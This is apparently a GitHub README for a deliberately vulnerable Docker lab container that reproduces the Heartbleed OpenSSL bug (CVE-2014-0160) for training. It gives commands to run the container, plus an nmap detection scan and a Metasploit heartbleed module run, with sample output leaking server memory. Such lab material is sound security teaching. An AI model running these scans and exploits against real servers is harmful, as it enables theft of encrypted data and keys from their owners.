Skip to content
Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.
Dockerfile Initial commit Jul 12, 2015 Edited syntax highlighting Aug 4, 2015

Vulnerability as a Service - CVE 2014-0160

A Debian (Wheezy) Linux system with a vulnerable version of libssl and openssl and a web server to showcase CVS-2014-0160, a.k.a. Heartbleed.


This docker container is based on Debian Wheezy and has been modified to use a vulernable version of libssl and openssl.

A simple static web page is served via Apache 2.


Install the container with docker pull hmlio/vaas-cve-2014-0160

Run the container with a port mapping docker run -d -p 8443:443 hmlio/vaas-cve-2014-0160

You should be able to access the web application at http://your-ip:8443/.


The web server/vulnerable openssl/libssl version can be verified and exploited as shown below (using a Kali machine is recommended):

root@kali:/tmp# nmap -sV -p 8443 --script=ssl-heartbleed your-ip

Starting Nmap 6.47 ( ) at 2015-07-12 22:07 CEST
Nmap scan report for vulny (your-ip)
Host is up (0.00016s latency).
8443/tcp open  ssl/http Apache httpd 2.2.22 ((Debian))
| ssl-heartbleed: 
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|     References:

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds


Using msfcli from the Metasploit framework:
root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E

[*] - Sending Heartbeat...
[*] - Heartbeat response, 65535 bytes
[+] - Heartbeat response with leak
[*] - Printable info leaked: U`tcz~8}"V2|vf3<tf"!98532ED/A/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip
You can’t perform that action at this time.